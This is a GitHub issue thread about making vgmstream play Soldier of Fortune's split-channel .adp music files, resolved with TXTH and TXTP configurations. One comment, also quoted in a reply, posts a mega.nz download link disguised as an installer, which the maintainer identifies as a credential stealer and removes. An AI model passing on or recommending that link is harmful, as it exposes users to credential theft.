### ISSUE TITLE
[Bug] Soldier of Fortune ADP music files can't play normally

### ISSUE THREAD

**Issue by Maxkatsur** [vgmstream/vgmstream#1582]
_Soldier of Fortune_ (2000, Raven Software) has audio files with `.adp` extension, which implies it runs on ADPCM codec. Unfortunately VGMStream Foobar2000 still can't run these files, maybe they are either encrypted, headerless or use some custom header. Probably no one in there have heard of this before, but I've recently experimented with such gamerip files with .adp.txth files (IMA ADPCM codec, 22050 sample rate, stereo, data size)... to garbled results. I wonder if anyone had experimented with this case. Worse, all those ADP files are splitted into one channel (eg. `lTrainAction.adp` for left, `rTrainAction.adp `for right), but VGMStream cannot play both of these files into one stereo stream at the same time, unlike _Metroid Prime_ (GameCube) and _SoulCalibur_ (Dreamcast).

Further experiments with TXTH file, with mono instead of stereo on such file, resulted it in above-mentioned files played normally, albeit of worse, more-muffled quality than heard in-game.

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Maxkatsur** [comment]
> Download https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU In the installer menu, select "gcc."

But this thing is virus-ridden!

**Comment by hcs64** [comment]
That link seems to be a credential stealer, I hid the comment and removed the link from your comment.

**Comment by Maxkatsur** [comment]
> That link seems to be a credential stealer, I hid the comment and removed the link from your comment.

Thanks, HCS64. That guy failed to realize this link is a credential stealer, and he didn't understood the whole situation there. Also, I only reported him for the aforementioned credential-stealing malware link.

**Comment by bnnm** [comment]
You can make those .adp playable with txth:
```
codec = DVI_IMA
channels = 1
sample_rate = @0x00
start_offset = 0x04
num_samples = data_size

num_samples = num_samples - 36
```

vgmstream can't open those `lTrainAction.adp` + `rTrainAction.adp` files automatically but should be easy enough to make .txtp that mixes them:
```
lTrainAction.adp
rTrainAction.adp
mode = layers
commands = #e
```

**Comment by Maxkatsur** [comment]
Thank you so much, BNNM! They really work. Case solved.
